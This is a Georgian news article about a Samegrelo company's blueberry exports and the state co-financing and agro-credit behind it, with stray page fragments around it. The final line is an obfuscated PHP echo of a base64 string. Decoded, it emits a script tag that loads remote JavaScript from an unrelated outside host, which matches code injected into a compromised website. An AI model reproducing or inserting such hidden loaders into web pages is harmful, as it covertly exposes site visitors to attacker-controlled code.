celsiusi
ავერსი შნაიდერი

სამეგრელოში, კერძოდ ხობში 16 ჰა-ზე გაშენებული მოცვის ბაღების მმართველმა კომპანია „გოლდენ ფარმსმა“ 30 ტონამდე ლურჯი მოცვი ექსპორტზე გალფის ქვეყნებში, ჩინეთში, გერმანიასა და პოლონეთში გაიტანა. ინფორმაციას სოფლის მეურნეობის სამინისტრო ავრცელებს.

ცნობისთვის, 2020 წელს, კომპანიამ „გოლდენ ფარმს“ 16 ჰექტარზე მოცვის თანამედროვე ბაღის გაშენებისა და სარწყავი სისტემის მოწყობისათვის პროგრამის „დანერგე მომავალი“ ფარგლებში 250,000 ლარის ოდენობით თანადაფინანსება მიიღო, ხოლო შეღავათიანი აგროკრედიტის ფარგლებში მიღებულმა აგროსესხმა 850,000 ლარი შეადგინა. ამასთან, კომპანიამ თანამედროვე სტანდარტებით აღჭურვილი სამაცივრე მეურნეობის მოსაწყობად 3.5 მლნ ლარის ინვესტიცია განახორციელა, მათ შორის სოფლის განვითარების სააგენტოს გრანტი 500,000 ლარია და 1,2 მლნ ლარი - შეღავათიანი აგროკრედიტი. სამაცივრე მეურნეობას 250 ტონა ლურჯი მოცვის შენახვის შესაძლებლობა აქვს. კომპანიაში 10 ადგილობრივია დასაქმებული.

„სახელმწიფო ეხმარება ლურჯი მოცვის სექტორის განვითარებას როგორც პირველადი წარმოების, ასევე შენახვა-რეალიზაციის მიმართულებებით. პროგრამის „დანერგე მომავალი“ ფარგლებში, ლურჯი მოცვის ბაღები საქართველოში გაშენდა 2,500 ჰექტარზე, აქედან, 1500 ჰა სამეგრელოს რეგიონში, სადაც სახელმწიფოს მხრიდან თანადაფინანსებამ 27 მლნ ლარი შეადგინა“, - ამბობს სოფლის განვითარების სააგენტოს დირექტორის მოადგილე ნატალია ხარატიშვილი.

უწყების ცნობით, საქართველოს მასშტაბით, ლურჯი მოცვის გაშენების მიზნობრიობით გაცემული შეღავათიანი აგროკრედიტი 127,9 მლნ ლარს აღემატება, სადაც სესხის პროცენტის სუბსიდირებას სოფლის განვითარების სააგენტო 16,6 მლნ ლარის ოდენობით ახორციელებს. მათ შორის, სამეგრელოს რეგიონში ლურჯი მოცვის გაშენების მიზნობრიობით გაცემულია 69 მლნ ლარზე მეტი, სოფლის განვითარების სააგენტოს თანადაფინანსება 9,8 მლნ ლარს აღემატება. 

391
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");